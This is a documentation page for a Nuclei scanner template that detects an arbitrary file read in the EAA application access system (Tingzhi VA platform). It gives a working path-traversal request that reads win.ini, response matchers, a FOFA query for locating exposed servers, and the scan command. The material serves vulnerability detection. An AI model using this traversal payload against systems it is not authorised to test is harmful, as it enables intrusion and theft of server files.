EAA Application Access System - Arbitary File Read
ID: eaa-app-lfi
Severity: high
Author: momika233
Tags: eaa,lfi
Description
Section titled “Description”There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server.
YAML Source
Section titled “YAML Source”id: eaa-app-lfi
info: name: EAA Application Access System - Arbitary File Read author: momika233 severity: high description: | There is an arbitrary file reading vulnerability in the VA virtual application platform of Tingzhi Technology, through which an attacker can obtain sensitive information in the server. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%9C%86%E6%99%BA%E7%A7%91%E6%8A%80%20VA%E8%99%9A%E6%8B%9F%E5%BA%94%E7%94%A8%E5%B9%B3%E5%8F%B0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: body="EAA益和应用接入系统" tags: eaa,lfi
http: - method: GET path: - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"
matchers-condition: and matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and
- type: word part: header words: - "application/octet-stream" - "filename=win.ini" condition: and
- type: status status: - 200# digest: 4b0a00483046022100d4c130b0df033c02a4ce3008296d7ea04df4989ee09835c6cf6b2c86a8bc34cf022100fd374a2f78341ec3818e121e2e37600654796c0dd519b68e73048b4b3c58f24f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/eaa-app-lfi.yaml"